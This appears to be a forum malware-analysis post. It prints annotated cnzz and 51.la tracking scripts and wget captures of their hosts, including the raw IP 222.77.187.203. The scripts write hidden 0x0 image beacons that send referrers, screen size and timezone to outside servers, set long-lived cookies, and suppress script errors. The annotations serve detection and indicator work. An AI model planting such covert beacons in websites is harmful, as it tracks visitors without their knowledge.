// analyst note: 0x0 img beacon straight to the IP 222.77.187.203; the capture
// below shows it answering "Power by Cnzz"
document.write('<img src="http://222.77.187.203/stat.htm?id=1019605'+data+'" border=0 width=0 height=0>');
// analyst note: seconds left in the local day; the daily counter cookie is set to
// expire around local midnight (after timezone adjustment), the others in 182 days
var et=(86400-ed.getHours()*3600-ed.getMinutes()*60-ed.getSeconds());
ed.setTime(now+1000*(et-ed.getTimezoneOffset()*60));
document.cookie="cnzz_a1019605="+cnzz_a+";expires="+ed.toGMTString()+ "; path=/";
ed.setTime(now+1000*86400*182);
document.cookie="rtime="+rt+";expires="+ed.toGMTString()+ ";path=/";
document.cookie="ltime="+now+";expires=" + ed.toGMTString()+ ";path=/";
document.cookie="cnzz_eid="+escape(eid)+ ";expires="+ed.toGMTString()+";path=/";


Code: [Select]
--11:55:32--  http://js.users.51.la/2087353.js
           => `2087353.js'
Resolving js.users.51.la... 122.224.146.36
Connecting to js.users.51.la[122.224.146.36]:80... connected
HTTP request sent, awaiting response... 200 OK

Code: [Select]
// analyst note: 2087353.js again, this time served from 122.224.146.36 rather than
// 202.104.236.224 as earlier in the thread -- same script body, so js.users.51.la
// is presumably load-balanced across several addresses and the hostname, not the
// IP, is the stable indicator
// analyst note: visible 51.la badge link plus an icon from icon.ajiang.net
document.write ('<a href="http://www.51.la/?2087353" target="_blank"><img alt="&#x35;&#x31;&#x2E;&#x6C;&#x61;&#x20;&#x4E13;&#x4E1A;&#x3001;&#x514D;&#x8D39;&#x3001;&#x5F3A;&#x5065;&#x7684;&#x8BBF;&#x95EE;&#x7EDF;&#x8BA1;" src="http://icon.ajiang.net/icon_0.gif" style="border:none" /></a>\n');
// A Popular Free Statistics Service for 100 000+ Webmasters.
// analyst note: silences script errors for the rest of the page
window.onerror=function(){return true};
// analyst note: collects referrers (own/top/parent), parent location, colour
// depth, screen size and timezone, keeps AJSTAT_ok_pages (~1 h) and
// AJSTAT_ok_times (~365 d) cookies, then writes a 0x0 img beacon to web.51.la/go.asp
document.write ('<script>var a7353tf="51la";var a7353pu="";var a7353pf="51la";var a7353su=window.location;var a7353sf=document.referrer;var a7353of="";var a7353op="";var a7353ops=1;var a7353ot=1;var a7353d=new Date();var a7353color="";if (navigator.appName=="Netscape"){a7353color=screen.pixelDepth;} else {a7353color=screen.colorDepth;}<\/script><script>a7353tf=top.document.referrer;<\/script><script>a7353pu =window.parent.location;<\/script><script>a7353pf=window.parent.document.referrer;<\/script><script>a7353ops=document.cookie.match(new RegExp("(^| )AJSTAT_ok_pages=([^;]*)(;|$)"));a7353ops=(a7353ops==null)?1: (parseInt(unescape((a7353ops)[2]))+1);var a7353oe =new Date();a7353oe.setTime(a7353oe.getTime()+60*60*1000);document.cookie="AJSTAT_ok_pages="+a7353ops+ ";path=/;expires="+a7353oe.toGMTString();a7353ot=document.cookie.match(new RegExp("(^| )AJSTAT_ok_times=([^;]*)(;|$)"));if(a7353ot==null){a7353ot=1;}else{a7353ot=parseInt(unescape((a7353ot)[2])); a7353ot=(a7353ops==1)?(a7353ot+1):(a7353ot);}a7353oe.setTime(a7353oe.getTime()+365*24*60*60*1000);document.cookie="AJSTAT_ok_times="+a7353ot+";path=/;expires="+a7353oe.toGMTString();<\/script><script>a7353of=a7353sf;if(a7353pf!=="51la"){a7353of=a7353pf;}if(a7353tf!=="51la"){a7353of=a7353tf;}a7353op=a7353pu;try{lainframe}catch(e){a7353op=a7353su;}document.write(\'<img style="width:0px;height:0px" src="http://web.51.la/go.asp?we=A-Free-Service-for-Webmasters&svid=27&id=2087353&tpages=\'+a7353ops+\'&ttimes=\'+a7353ot+\'&tzone=\'+(0-a7353d.getTimezoneOffset()/60)+\'&tcolor=\'+a7353color+\'&sSize=\'+screen.width+\',\'+screen.height+\'&referrer=\'+escape(a7353of)+\'&vpage=\'+escape(a7353op)+\'" \/>\');<\/script>');


Code: [Select]
--11:58:01--  http://www.cnzz.com/stat/website.php?web_id=1019605
           => `website.php?web_id=1019605'
Resolving www.cnzz.com... 127.0.0.1
Connecting to www.cnzz.com[127.0.0.1]:80... connected
HTTP request sent, awaiting response... 500

Comment: www.cnzz.com is null-routed by DNS on the analysis host (it resolves to 127.0.0.1), so this request never left the lab.


Code: [Select]
--11:59:17--  http://222.77.187.203/stat.htm?id=1019605
           => `stat.htm?id=1019605'
Connecting to 222.77.187.203:80... connected
HTTP request sent, awaiting response... 200 OK

Code: [Select]
Power by Cnzz
Malware analysed using Clarified Analyzer to record and document how the malware behaves in a networked environment.